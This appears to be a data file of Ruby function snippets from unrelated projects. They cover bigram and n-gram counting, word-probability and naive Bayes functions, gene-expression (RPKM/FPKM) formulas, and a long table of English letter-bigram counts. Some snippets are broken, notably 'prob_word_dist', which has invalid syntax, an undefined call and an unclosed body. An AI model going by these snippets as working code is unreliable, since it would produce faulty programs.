"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def rpkm(counts, total_mapped_reads, gene_length)\n if counts && gene_length\n sprintf(\"%.2f\",(1e9*counts.to_f)/(total_mapped_reads*gene_length)).to_f\n else\n 0.0\n end\nend",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def probability_exact\n\t\t str_format=\"%0#{nr}b\"\n\t\t combinations=2**nr\n\t\t #p str_format\n\t\t total_w=combinations.times.map do |i|\n comb=sprintf(str_format,i)\n w_local=comb.length.times.inject(0) do |ac,j|\n sgn=comb[j]==\"0\" ? -1 : 1\n\t\t\t\t ac+(j+1)*sgn\n end\n\t\t end.sort\n\n \t\t total_w.find_all do |v| \n if @tails==:both\n v<=-w.abs or v>=w.abs\n elsif @tails==:left\n v<=w\n elsif @tails==:right\n \t\t\t\t v>=w\n end\n \t\t end.count/(combinations.to_f)\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def file_process(file)\n\n stop_words = File.read('stop_words.txt').split(\"\\n\")\n\n lines = File.readlines(file)\n title = lines[0]\n speech = lines[1..-1]\n line_count = speech.size\n text = speech.join\n char_count = text.length\n char_count_nospaces = text.force_encoding('UTF-8').gsub(/\\s+/, '').length\n word_count = text.scan(/\\w+/).length\n sentence_count = text.split(/\\.|\\?|!/).length\n average_words_sentence = word_count / sentence_count\n paragraph_count = text.split(/\\n\\n/).length\n word_frequency_hash = {}\n word_frequency_top = []\n\n text.split().each do |word|\n unless stop_words.include?(word.downcase)\n if word_frequency_hash.has_key?(word.downcase)\n word_frequency_hash[word.downcase] += 1\n else\n word_frequency_hash[word.downcase] = 1\n end\n end\n end\n\n non_fluff_words = (word_frequency_hash.size.to_f / word_count.to_f * 100).to_i\n\n array_of_sentences = text.scan(/[^\\.!?]+[\\.!?]/).map(&:strip).sort_by { |sentence| sentence.length }\n ideal_sentences = array_of_sentences[array_of_sentences.length/3..array_of_sentences.length - array_of_sentences.length/3]\n\n word_frequency = word_frequency_hash.sort_by { |key, value| value}.reverse\n word_frequency.flatten.each_with_index { |word, index| word_frequency_top << word if index.even? }\n\n puts \"#{title}\"\n puts \"#{line_count} lines\"\n puts \"#{char_count} characters\"\n puts \"#{char_count_nospaces} characters excluding spaces\"\n puts \"#{word_count} words\"\n puts \"#{sentence_count} sentences\"\n puts \"#{paragraph_count} paragraphs\"\n puts \"#{average_words_sentence} words per sentence (average)\"\n puts \"#{word_frequency_hash.size} non-fluff words\"\n puts \"roughly #{non_fluff_words} percent non-fluff words.\"\n puts \"Top 10 non-fluff words: #{word_frequency_top.take(10)} top 10 non-fluff words.\"\n puts \"Ideal sentences array: #{ideal_sentences.take(7) }\"\n puts\n puts\n\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def apply_usage_weights(word_hash)\n max_usage = @word_list.values.max.to_f\n max_usage = 1 if max_usage == 0\n\n weighted_array = word_hash.map do |word, bigram_score|\n usage_score = @word_list[word].to_f / max_usage\n [word, (bigram_score * (1 - @alpha)) + (usage_score * @alpha)]\n end\n\n Hash[weighted_array]\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def ngram_sets_w_freq_within_percent(n,pc)\n return nil unless (n.is_a?(Integer) && n>=1)\n arr = []\n (1..n).each {|i|\n @freq_n_chars[i].keys.each { |c|\n curr_freq = @freq_n_chars[i][c]\n @freq_n_chars[i].select {|k,v| k > c && ((v-curr_freq).abs < (pc ** i))}.keys.each { |el|\n if c.length==1\n arr << [c,el]\n else\n arr1 = c.chars\n arr2 = el.chars\n (0..(arr1.length-1)).each {|j|\n sorted_swp_chars = [arr1[j],arr2[j]].sort\n arr << sorted_swp_chars unless (arr.include?(sorted_swp_chars) || (arr1[j] == arr2[j]))\n }\n end\n }\n }\n }\n arr\n # result is an array of 2-element-arrays; each element of the\n # 2-element-array is an ngram similar to the other element ngram of same n\n end",
"def calculateWeight word\n letters = word.split\n weight = 0\n hash_alphabet = generateHashWithLetterAndWeight()\n letters.each do |letter|\n (/[[:upper:]]/.match(letter)) ? weight += hash_alphabet[letter.downcase].to_i * 2 : weight += hash_alphabet[letter.downcase].to_i\n end\n weight\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def weight_in_words\n wt_kg = self.E16_01.to_f # in kg\n wt_lb = self.E16_88.to_f\n wt_in_lbs = wt_lb > 0 ? wt_lb : wt_kg*2.20462262\n \"%s lbs - %d kg\" % [((wt_in_lbs < 100) ? wt_in_lbs.round(1) : wt_in_lbs.round), wt_kg]\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def calc_FPKM(weight_per_kb, total_num_read)\n\treturn weight_per_kb * 1_000_000 / total_num_read\nend",
"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def weighted_random(lastword)\n # If word has no words in its dictionary (last word in source text file)\n # have it pick a random word to display instead.\n @dictionary.dictionary.fetch(lastword, NULL_OBJECT).sample\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def question_prob(question, type)\n type_prob = type_count(type) / @training_count\n doc_prob = question.split(' ').map { |w|\n word_weighted_average w, type\n }.inject(1) { |p,c| p * c }\n type_prob * doc_prob\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def weight(text)\n weight = @emphasis[:multiplier]\n\n if text.length >= @emphasis[:long_words_threshold]\n weight *= @emphasis[:long_words]\n end\n\n if text[0,1] == text[0,1].upcase\n weight *= @emphasis[:upper_case]\n end\n\n weight += vowels(text)\n weight += consonants(text)\n weight\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def probability\n return @probability\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
